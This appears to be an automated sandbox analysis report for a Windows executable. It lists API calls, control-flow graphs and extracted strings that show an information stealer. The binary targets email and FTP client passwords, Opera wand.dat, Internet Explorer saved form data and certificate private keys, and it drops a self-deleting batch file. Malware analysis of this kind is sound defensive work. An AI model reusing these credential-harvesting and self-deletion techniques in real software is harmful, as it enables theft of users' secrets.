lstrlen 9210->9211 9219 4018cf LocalAlloc 9211->9219 9214 401e85 lstrcpy lstrcat 9215 401ea2 9214->9215 9216 401eaa 9214->9216 9216->9110 9218->9209 9219->9214 12819 40c587 12820 40c596 12819->12820 12821 40c59a MultiByteToWideChar 12819->12821 12831 4018cf LocalAlloc 12821->12831 12823 40c5b7 MultiByteToWideChar StgOpenStorage 12826 40c5eb 12823->12826 12827 40c660 12823->12827 12824 4018b8 LocalFree 12825 40c67b 12824->12825 12826->12827 12832 4018cf LocalAlloc 12826->12832 12827->12824 12829 40c620 12830 4018b8 LocalFree 12829->12830 12830->12827 12831->12823 12832->12829 9220 40fe88 9221 410061 9220->9221 9226 40fe96 9220->9226 9224 40fed4 wsprintfA 9225 401e4c 6 API calls 9224->9225 9225->9226 9226->9221 9226->9224 9227 4018b8 LocalFree 9226->9227 9228 40ff51 GetTempPathA 9226->9228 9229 40ff75 GetTickCount wsprintfA CreateDirectoryA 9226->9229 9238 403d6d 9226->9238 9246 401788 756D19A0 9226->9246 9227->9226 9228->9226 9234 40ffa9 9229->9234 9230 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9230->9234 9231 401e4c 6 API calls 9231->9234 9233 40fffb lstrlen 9236 4026dd 19 API calls 9233->9236 9234->9230 9234->9231 9234->9233 9235 4018b8 LocalFree 9234->9235 9253 401463 ExitProcess 9234->9253 9235->9226 9237 410016 ShellExecuteA 9236->9237 9237->9234 9239 403d7a 9238->9239 9259 403bff 9239->9259 9242 403db2 9242->9226 9243 403bff 24 API calls 9244 403da9 9243->9244 9247 4017c9 9246->9247 9248 40179e 9246->9248 9247->9226 9249 4017a6 GlobalFix 9248->9249 9249->9247 9250 4017b5 9249->9250 9289 402497 9250->9289 9254 4014df 9253->9254 9258 40148c 9253->9258 9254->9234 9255 4014bc 9256 4014d7 CloseHandle 9255->9256 9256->9254 9257 401422 WriteFile 9257->9258 9258->9255 9258->9256 9258->9257 9286 4018cf LocalAlloc 9259->9286 9261 403c13 9287 4018cf LocalAlloc 9261->9287 9263 403c20 9288 4018cf LocalAlloc 9263->9288 9265 403c2d InternetCrackUrlA 9266 403c74 9265->9266 9267 403c7a 9265->9267 9266->9267 9268 403c7f InternetCreateUrlA 9266->9268 9270 4018b8 LocalFree 9267->9270 9268->9267 9269 403ca4 InternetCrackUrlA 9268->9269 9269->9267 9271 403ce5 9269->9271 9272 403d55 9270->9272 9271->9267 9273 403ced wsprintfA 9271->9273 9274 4018b8 LocalFree 9272->9274 9276 403800 5 API calls 9273->9276 9275 403d5d 9274->9275 9277 4018b8 LocalFree 9275->9277 9278 403d12 9276->9278 9279 403d65 9277->9279 9278->9267 9280 403d18 lstrlen 9278->9280 9279->9242 9279->9243 9281 403884 send 9280->9281 9286->9261 9287->9263 9288->9265 9294 4018cf LocalAlloc 9289->9294 9291 4024ab 9292 4018b8 LocalFree 9291->9292 9293 4017c1 GlobalUnWire 9292->9293 9293->9247 9294->9291 8896 401011 756A4620 9309 41051e OleInitialize 9327 402530 9309->9327 9312 40fa90 GetTickCount 9410 4024d6 LoadLibraryA 9327->9410 9329 40253f 9330 4024d6 2 API calls 9329->9330 9331 40254e 9330->9331 9332 4024d6 2 API calls 9331->9332 9333 40255d 9332->9333 9334 4024d6 2 API calls 9333->9334 9335 40256c 9334->9335 9336 4024d6 2 API calls 9335->9336 9337 40257b 9336->9337 9338 4024d6 2 API calls 9337->9338 9339 40258a 9338->9339 9340 4024d6 2 API calls 9339->9340 9341 402599 9340->9341 9342 4024d6 2 API calls 9341->9342 9343 4025a8 9342->9343 9343->9312 9411 4024f0 9410->9411 9412 4024e9 9410->9412 9413 402524 9411->9413 9414 40250b GetProcAddress 9411->9414 9412->9329 9413->9329 9414->9411 9415 402516 9414->9415 9415->9329 8975 401226 ExitProcess 8976 401241 8975->8976 8977 401245 ReadFile 8975->8977 8978 401271 8977->8978 8979 401263 CloseHandle 8977->8979 8978->8977 8980 401289 CloseHandle 8978->8980 8897 410630 8898 410642 8897->8898 8899 41062f GetTickCount 8897->8899 8901 41064b ExitProcess 8898->8901 8899->8898 12653 40bc36 12654 40bc4d 12653->12654 12655 40bc44 12653->12655 12655->12654 12656 40bcc8 CryptUnprotectData 12655->12656 12656->12654 12657 40bcfb 12656->12657 12657->12654 12658 40bd1f LocalFree 12657->12658 12658->12654 12659 40bd37 12658->12659 12659->12654 12668 4018cf LocalAlloc 12659->12668 12661 40bd53 12662 40bd64 lstrlen StrCmpNIA 12661->12662 12663 40bd80 lstrlen StrCmpNIA 12662->12663 12664 40bd98 12662->12664 12663->12664 12665 40bd9c lstrlen StrCmpNIA 12664->12665 12667 40bdb4 12664->12667 12665->12667 12666 4018b8 LocalFree 12666->12654 12667->12666 12668->12661

                                  Control-flow Graph

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00410092
                                  • wsprintfA.USER32 ref: 004100A0
                                  • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
                                  • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
                                  • lstrcat.KERNEL32(?,?), ref: 0041012A
                                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
                                  • lstrcpy.KERNEL32(?,?), ref: 0041015A
                                  • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
                                  • lstrcpy.KERNEL32(00000001,?), ref: 00410174
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                                  • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                  • API String ID: 629621046-4169620016
                                  • Opcode ID: 270682a80fd2c67668d2710170160f1c69808533e8c243e476adbd79d697b677
                                  • Instruction ID: d87f7c95a24b28c2337a621791b8d5a4a1afbdb6f7934d1f864dba4089bdb773
                                  • Opcode Fuzzy Hash: 270682a80fd2c67668d2710170160f1c69808533e8c243e476adbd79d697b677
                                  • Instruction Fuzzy Hash: C5413030B542057ADF1576A18C03FEE7AA7AB85704F24843A7614F62E1EEF94DD05A1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EBEA
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                  • API String ID: 1332880857-2111798378
                                  • Opcode ID: 6ada38419714442fc33c3569d43ab68b96eb4c978848aa422c85558e33a587ec
                                  • Instruction ID: e2a117a2fde9dc82a56ede7dd39e4504eb823868495590e5bf7fc199db2764f0
                                  • Opcode Fuzzy Hash: 6ada38419714442fc33c3569d43ab68b96eb4c978848aa422c85558e33a587ec
                                  • Instruction Fuzzy Hash: E871A23194011CAADF226F51CC02FEDBAB6FF04704F1485BAB558740B1DB7A5BA1AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 40d3be-40d3dc call 4015f0 249 40d3e2-40d3e9 246->249 250 40d5af-40d5bd call 401636 246->250 249->250 252 40d3ef-40d3f6 249->252 252->250 254 40d3fc-40d403 252->254 254->250 255 40d409-40d410 254->255 255->250 256 40d416-40d41d 255->256 256->250 257 40d423-40d42a 256->257 257->250 258 40d430-40d437 257->258 258->250 259 40d43d-40d451 CertOpenSystemStoreA 258->259 259->250 260 40d457 259->260 261 40d459-40d467 CertEnumCertificatesInStore 260->261 262 40d469-40d5a9 CertCloseStore 261->262 263 40d46e-40d47c 261->263 262->250 265 40d482 263->265 266 40d59f 263->266 267 40d595-40d599 265->267 266->261 267->266 268 40d487-40d495 lstrcmp 267->268 269 40d49b-40d49f 268->269 270 40d58f-40d592 268->270 269->270 271 40d4a5-40d4cd call 4018cf call 401906 lstrcmp 269->271 270->267 276 40d4d3-40d4ea CryptAcquireCertificatePrivateKey 271->276 277 40d587-40d58a call 4018b8 271->277 276->277 278 40d4f0-40d502 CryptGetUserKey 276->278 277->270 280 40d504-40d51b CryptExportKey 278->280 281 40d57c-40d581 CryptReleaseContext 278->281 282 40d573-40d576 CryptDestroyKey 280->282 283 40d51d-40d540 call 4018cf CryptExportKey 280->283 281->277 282->281 286 40d542-40d566 call 401569 call 40159f * 2 283->286 287 40d56b-40d56e call 4018b8 283->287 286->287 287->282
                                  APIs
                                  • CertOpenSystemStoreA.CRYPT32(00000000,00416871), ref: 0040D444
                                  • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
                                  • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D48E
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • lstrcmp.KERNEL32(?,0041687E), ref: 0040D4C6
                                  • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
                                  • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
                                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
                                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
                                  • CryptDestroyKey.ADVAPI32(?), ref: 0040D576
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                  • String ID: 2.5.29.37
                                  • API String ID: 2649496969-3842544949
                                  • Opcode ID: 4d691b1bdc824cf6257b5e200ae883cf0f1d0f75a2c0f084efd897e49e48fde0
                                  • Instruction ID: 69ea86f0ab44da64ba056d6111593992adadb32ff072f1572f9399bad78f7f88
                                  • Opcode Fuzzy Hash: 4d691b1bdc824cf6257b5e200ae883cf0f1d0f75a2c0f084efd897e49e48fde0
                                  • Instruction Fuzzy Hash: 9A512931900205FBDF21AB94DC09BEEBB71BF44745F148436BA01761F0D779AA94DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 404e73-404e8b 295 404e92 294->295 296 404e8d-404e90 294->296 297 404ff0-404ffc call 4018b8 295->297 296->295 298 404e97-404ea1 call 4025a9 296->298 303 404eb2-404eba call 401df8 298->303 304 404ea3-404eb0 call 401df8 298->304 308 404ebf-404eef call 4018e6 FindFirstFileA 303->308 304->308 308->297 311 404ef5-404f01 308->311 312 404f03-404f13 lstrcmpiA 311->312 313 404f68-404f83 StrStrIA 311->313 316 404f15 312->316 317 404f1a-404f30 lstrcmpiA 312->317 314 404f85-404fa4 call 401df8 call 401e4c 313->314 315 404fcb-404fdf FindNextFileA 313->315 329 404fb3 314->329 330 404fa6-404fb1 StrStrIA 314->330 315->311 318 404fe5-404feb FindClose 315->318 316->315 320 404f32 317->320 321 404f37-404f66 call 401df8 call 401e4c call 404e73 call 4018b8 317->321 318->297 320->315 321->315 331 404fb8-404fbb 329->331 330->331 333 404fc6 call 4018b8 331->333 334 404fbd-404fc1 call 404e5c 331->334 333->315 334->333
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404EE3
                                  • lstrcmpiA.KERNEL32(00414F84,?), ref: 00404F0C
                                  • lstrcmpiA.KERNEL32(00414F86,?), ref: 00404F29
                                  • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404FD8
                                  • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404FEB
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                  • String ID: *.*$.ini$Sites\$\*.*
                                  • API String ID: 3040542784-999409347
                                  • Opcode ID: 913c22809564c420126ab0ad6117b8d34a4d3552d0a0fc7a9c59f7d53b67125e
                                  • Instruction ID: 4ebe6fddfcda91dad50fc3424f79042eee35b7dd55d742c6c8e7d1074e8a7db5
                                  • Opcode Fuzzy Hash: 913c22809564c420126ab0ad6117b8d34a4d3552d0a0fc7a9c59f7d53b67125e
                                  • Instruction Fuzzy Hash: 763166B090020AAADF11BF61CC42FEE77A9AF80304F1045B7B518B51E1D77C9EC19E59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GetVersionExA.KERNEL32(0000009C), ref: 00404646
                                  • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000,00000000,0000009C), ref: 004046CB
                                  • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,?,?,00000000,00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000), ref: 004046F4
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000400,00001001,?,000003FF,?), ref: 004047A9
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
                                  • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000400,00001001), ref: 004047D8
                                  • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000400,00001001,?,000003FF), ref: 004047E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                  • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                  • API String ID: 1787888500-92997708
                                  • Opcode ID: 37a17a25280d8645e9155b340e084eccfd7d21ba9ce20483f8edf5f3de10e339
                                  • Instruction ID: db48739d82feba77cf0cee32c0e06214f71ac3aef5999eac4331223504f8986d
                                  • Opcode Fuzzy Hash: 37a17a25280d8645e9155b340e084eccfd7d21ba9ce20483f8edf5f3de10e339
                                  • Instruction Fuzzy Hash: 55518471A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED59F5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*), ref: 00408B3A
                                  • lstrcmpiA.KERNEL32(00414F84,?), ref: 00408B6D
                                  • lstrcmpiA.KERNEL32(00414F86,?), ref: 00408B87
                                  • StrStrIA.SHLWAPI(?,opera,00000000,00000000,?,?,00414845,00414F86,?,00414F84,?,00000000,?,?,0000013E,?), ref: 00408BCC
                                  • FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408BFA
                                  • FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408C0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                                  • String ID: \*.*$opera$wand.dat
                                  • API String ID: 3663067366-3278183560
                                  • Opcode ID: a14426bd29130b28d236c1ee24eb789cba1acff1a0fb90d976b7f3061c701968
                                  • Instruction ID: e5ee878ad4cec5bad4980fd33fa9531b0e4dcb501f0c88bdaa15308997453479
                                  • Opcode Fuzzy Hash: a14426bd29130b28d236c1ee24eb789cba1acff1a0fb90d976b7f3061c701968
                                  • Instruction Fuzzy Hash: 88311E7090021D9ADB60AB51CD42AE977B5AB44304F0041BBB548B91E1DB78AEC19F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404216
                                  • lstrcmpiA.KERNEL32(00414F84,?), ref: 00404243
                                  • lstrcmpiA.KERNEL32(00414F86,?), ref: 00404260
                                  • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040432A
                                  • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040433D
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                  • String ID: *.*$\*.*
                                  • API String ID: 3040542784-1692270452
                                  • Opcode ID: 7f1df749a353bd01aee4414756f8ccb25f917e9acadbf86270f49ad91e1a77cf
                                  • Instruction ID: 5e5cf996161199591b6a28a4ff005dbab79564ec832c2e4b7604db23a3f30ec1
                                  • Opcode Fuzzy Hash: 7f1df749a353bd01aee4414756f8ccb25f917e9acadbf86270f49ad91e1a77cf
                                  • Instruction Fuzzy Hash: B44160B0600219AADF11AF61CC06AEE3B69AF84344F1041BBBA18750F1D7789AD1AE59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlenW.KERNEL32(?), ref: 0040A71C
                                  • wsprintfA.USER32 ref: 0040A79B
                                  • lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A7E1
                                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
                                  • LocalFree.KERNEL32(00000000,?,?), ref: 0040A85B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                  • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                  • API String ID: 1926481713-2450551051
                                  • Opcode ID: ee0a80bee310d683433b78f64dece06a6e2ba1eb5e7148e79ec718f8fa2b0db8
                                  • Instruction ID: 7cec4ba5f278735bef2daa032c3da861db9c271a8c642e1c0fec04d74f03301a
                                  • Opcode Fuzzy Hash: ee0a80bee310d683433b78f64dece06a6e2ba1eb5e7148e79ec718f8fa2b0db8
                                  • Instruction Fuzzy Hash: 5A414D72C1021CEADF11AFA1DC01AEDBB79FF04314F14803AF911B61A1D7799A51CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405252
                                  • lstrcmpiA.KERNEL32(00414F84,?), ref: 00405281
                                  • lstrcmpiA.KERNEL32(00414F86,?), ref: 0040529B
                                  • FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004052F3
                                  • FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405306
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                                  • String ID: \*.*
                                  • API String ID: 3663067366-1173974218
                                  • Opcode ID: 6bfe12bba214813211abbab5dda0842763db6018668022205bf7b8123009c172
                                  • Instruction ID: 4170e0cdbb32cde0fb555d52f6b502d03a9112cbff49fd029bea05776b430742
                                  • Opcode Fuzzy Hash: 6bfe12bba214813211abbab5dda0842763db6018668022205bf7b8123009c172
                                  • Instruction Fuzzy Hash: 18312D7190021AAADF21AB61CC42AEE77A9EF00314F0045BAF818B51E2D7789BD19F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
                                  • GetCurrentProcess.KERNEL32 ref: 004029AD
                                  • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
                                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
                                  • CloseHandle.KERNEL32(00000000), ref: 00402A11
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                  • String ID:
                                  • API String ID: 3038321057-0
                                  • Opcode ID: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                  • Instruction ID: e5dea28dedcf19f79be4c8bfd698f998e52e89be124952076ce29543bc0c9a4f
                                  • Opcode Fuzzy Hash: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                  • Instruction Fuzzy Hash: 1A111CB1A04209EFEF218F95DD49BEEB7B4BB40319F148136A151B41D0D7F89684CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OleInitialize.OLE32 ref: 0041051E
                                  • GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeNameUser
                                  • String ID: A@5q
                                  • API String ID: 2272643758-4148555416
                                  • Opcode ID: 85497f2bdb01d2529f6a018abb02cef2ef2c8c3cf164c0ec7a06705425c62149
                                  • Instruction ID: f8a90d01b74eef74cfed5de9fe492a059dec9afd9cac863eb884a77ae8a26fbd
                                  • Opcode Fuzzy Hash: 85497f2bdb01d2529f6a018abb02cef2ef2c8c3cf164c0ec7a06705425c62149
                                  • Instruction Fuzzy Hash: 1FF0FE74654209ADDB20BBB2DD076DD3AA65B0030CF14443BB918F11E2DAFD45C4EA2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
                                  • RevertToSelf.ADVAPI32 ref: 00410601
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterRevertSelfUnhandled
                                  • String ID:
                                  • API String ID: 669012916-0
                                  • Opcode ID: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                  • Instruction ID: 497a937cfd444ccb75a01f451d1fff2a03657cb5d6782b497a70bab0a2736278
                                  • Opcode Fuzzy Hash: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                  • Instruction Fuzzy Hash: 92D067744451498AD6757BF6A80A7DC3651ABC430EF40843FA401109A7CEFD24D8CD2F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405A74
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                  • API String ID: 1332880857-44262141
                                  • Opcode ID: 7ae5ce9b0488767520c6613742fa6100203cb30bf298544d802ebed269283304
                                  • Instruction ID: ef9fb06cd34c7ccf76aa40754f09ac5043f5b2b84b8ceac9111509753786a159
                                  • Opcode Fuzzy Hash: 7ae5ce9b0488767520c6613742fa6100203cb30bf298544d802ebed269283304
                                  • Instruction Fuzzy Hash: 51218131640A08FADF11AB50CC02FDD3B75AB84B05F20C167B515740E1DABD5AD0AF8C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402166
                                  • lstrlen.KERNEL32(?,00000000,00000000,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000), ref: 00402219
                                  • lstrlen.KERNEL32(?,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall), ref: 00402252
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
                                  • 756D19A0.OLE32(?,?,?,00000000,?,00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?,?,?), ref: 004022B5
                                  • GlobalFix.KERNEL32(?), ref: 004022E5
                                  • GlobalUnWire.KERNEL32(?), ref: 00402304
